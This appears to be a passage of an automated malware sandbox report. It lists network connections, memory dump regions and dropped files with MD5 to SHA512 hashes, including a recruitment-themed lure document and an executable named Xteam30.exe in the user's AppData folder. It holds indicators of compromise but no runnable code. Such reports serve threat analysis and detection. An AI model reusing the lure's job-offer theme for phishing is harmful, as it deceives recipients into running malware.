GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 11.249.22.2.in-addr.arpa udp
US 8.8.8.8:53 143.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1352-0-0x000000007204E000-0x000000007204F000-memory.dmp

memory/1352-1-0x0000000002BA0000-0x0000000002BD6000-memory.dmp

memory/1352-2-0x0000000072040000-0x00000000727F0000-memory.dmp

memory/1352-3-0x00000000056E0000-0x0000000005D08000-memory.dmp

memory/1352-4-0x0000000005610000-0x0000000005632000-memory.dmp

memory/1352-5-0x0000000005D80000-0x0000000005DE6000-memory.dmp

memory/1352-6-0x0000000005EA0000-0x0000000005F06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yu5ixgyf.5in.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1352-16-0x0000000005F10000-0x0000000006264000-memory.dmp

memory/1352-17-0x00000000064D0000-0x00000000064EE000-memory.dmp

memory/1352-18-0x0000000006500000-0x000000000654C000-memory.dmp

memory/1352-19-0x0000000007D10000-0x000000000838A000-memory.dmp

memory/1352-20-0x0000000006A70000-0x0000000006A8A000-memory.dmp

memory/1352-22-0x0000000007A30000-0x0000000007AC6000-memory.dmp

memory/1352-23-0x00000000079C0000-0x00000000079E2000-memory.dmp

memory/1352-24-0x0000000008940000-0x0000000008EE4000-memory.dmp

memory/1488-30-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-29-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-28-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-31-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-32-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-33-0x00007FFB6FB60000-0x00007FFB6FB70000-memory.dmp

memory/1488-34-0x00007FFB6FB60000-0x00007FFB6FB70000-memory.dmp

C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx

MD5 65d4be8afc700f773c79a0d89da13ec5
SHA1 f1bc5b54ee151155e8a85ca61ff1bea7295ee38d
SHA256 2189f8a864e30bf54fc7003c5d63ebfa143c6a07eca060638d30b0a473a97988
SHA512 25244cb6e322c39e7ef8bc1216280730be3927935a315174c1a75110257893f0d6ef41083e5409397396d8974c2fd2caf7003a20ff91de5c6462394d992e3a87

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 dcc5539b043d7681daaea721f9cc47ab
SHA1 f4a3c4d72ab342e70a28636ef43b986019a3eff0
SHA256 e4f6263f8a8ccfba449dcac191c33905d7eab17d70b615eb4bf030b2d49f0193
SHA512 b4b74954cb0e136c9c6e4f9e89d1d7d86a38351c3499a246a3087882fd3d52b6eee137a8ef2bdc0b75391cda4ff4ebe0422e2c6a8a6cbbfdfc760e1f37750fa5

memory/1352-67-0x000000007204E000-0x000000007204F000-memory.dmp

memory/1352-68-0x0000000072040000-0x00000000727F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Xteam30.exe

MD5 421700a2d6d8516013d87e04628d2802
SHA1 f738ae62f1016c0667115665c42e71d85cfb4d38
SHA256 cc00a259ec4ebde015fe0fad59f369ae23def081caa787ad0652f7d6b2fe6de0
SHA512 c411036515d4046ba62370c2f27e32d414273dc2e4004b9c4396c3518f951ef97c717ab532dd52100f2950e137249462495b376b8d89adde4c3f89292e9f70e6

memory/1352-82-0x0000000072040000-0x00000000727F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 3c33ca687681ba2d1edf5d32d8e22ab0
SHA1 8a50ef40497d260c5a84c7d0c10242d4cd0b5509
SHA256 141748f7ddcd1d6083a041ca770cf9ae3bb4d087cd7033f211b73026e63ad3c9
SHA512 6919d059d8e20f6ee86ad60643f3bc3d6733728839e5c35636359bb724f2d75f13af3bdb17382dc9f7186560f22cbd2abe761eba55e4e4bbfd5d24e11cd360a2

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 d70104b60aaaac0754ccee12bc609da8
SHA1 90ab1ed393002c29ba825450709f27324460cfc2
SHA256 09c64f765129dbbe0562a3df514a34c4c2ce363f0fb31e4e51e7572f45e7ce7b
SHA512 72c7c65e24e310b74b723a45662629c92532b12ccaede11c63730bc528ea414e31e42e71ac1378b0d3a3f485880b320a6eff188f3bc48518a37ce7701b29246f

memory/4620-98-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-144-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-147-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-145-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-146-0x0000000000400000-0x0000000000887000-memory.dmp

memory/936-148-0x00000000000D0000-0x0000000000180000-memory.dmp

memory/4620-150-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-149-0x0000000000400000-0x0000000000887000-memory.dmp

memory/936-151-0x0000000004F40000-0x0000000004FD2000-memory.dmp

memory/936-188-0x0000000000AD0000-0x0000000000AD8000-memory.dmp

memory/936-189-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

memory/936-190-0x00000000054A0000-0x00000000058A0000-memory.dmp

memory/936-191-0x00000000054A0000-0x00000000058A0000-memory.dmp

memory/936-192-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

memory/936-194-0x0000000076600000-0x0000000076815000-memory.dmp

memory/4340-195-0x0000000001100000-0x0000000001109000-memory.dmp

memory/4340-198-0x0000000002D20000-0x0000000003120000-memory.dmp

memory/4340-202-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

memory/4340-210-0x0000000076600000-0x0000000076815000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDFCE4.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810